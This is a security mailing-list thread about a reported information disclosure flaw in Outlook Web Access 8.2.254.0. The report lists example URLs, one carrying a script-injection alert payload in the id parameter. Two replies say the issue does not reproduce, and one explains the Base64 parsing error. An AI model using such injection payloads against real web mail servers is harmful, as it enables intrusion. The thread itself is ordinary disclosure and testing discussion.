Re: Microsoft Outlook Web Access (OWA) v8.2.254.0 id parameter Information Disclosure Vulnerability

[Jabłoński , Paweł]

Not working at my environment: Tested on Firefox 3.6.3 (Linux).

OWA version: 8.2.254.0

Exception type: Microsoft.Exchange.Data.Storage.CorruptDataException. OWA uses 
System.Convert.FromBase64String(String s) for parsing the address, so even when 
you 
try to put the representation there, you should get the invalid format of 
serialized ID anyways.
Weird it goes through at yours.

Regards,
Pawel Jablonski

 $$
 Microsoft Outlook Web Access (OWA) version 8.2.254.0
 OS: Windows Server 2003
 Internet Explorer 7
 $$
 There is an information disclosure vulnerability in Microsoft Outlook Web 
 Access (OWA) version 8.2.254.0.

 The issue is with the id parameter.

 Following are different exploitation techniques:
 https://example.com/owa/?ae=Foldert=IPF.Noteid=scriptalert(HHH)/script
 https://example.com/owa/?ae=Foldert=IPF.Noteid=
 https://example.com/owa/?ae=Foldert=IPF.Noteid=A

 Whom to contact to get a CVE Identifier for this vulnerability.

 Best Regards,
 Praveen Darshanam,
 Security Researcher,
 INDIA

Re: Microsoft Outlook Web Access (OWA) v8.2.254.0 id parameter Information Disclosure Vulnerability

[info]

Not working , Tested on : XpSp2 , IE6

Microsoft Outlook Web Access (OWA) v8.2.254.0 id parameter Information Disclosure Vulnerability

[praveen_recker]

$$
Microsoft Outlook Web Access (OWA) version 8.2.254.0
OS: Windows Server 2003
Internet Explorer 7
$$
There is an information disclosure vulnerability in Microsoft Outlook Web 
Access (OWA) version 8.2.254.0.

The issue is with the id parameter.

Following are different exploitation techniques:
https://example.com/owa/?ae=Foldert=IPF.Noteid=scriptalert(HHH)/script
https://example.com/owa/?ae=Foldert=IPF.Noteid=
https://example.com/owa/?ae=Foldert=IPF.Noteid=A


Whom to contact to get a CVE Identifier for this vulnerability.

Best Regards,
Praveen Darshanam,
Security Researcher,
INDIA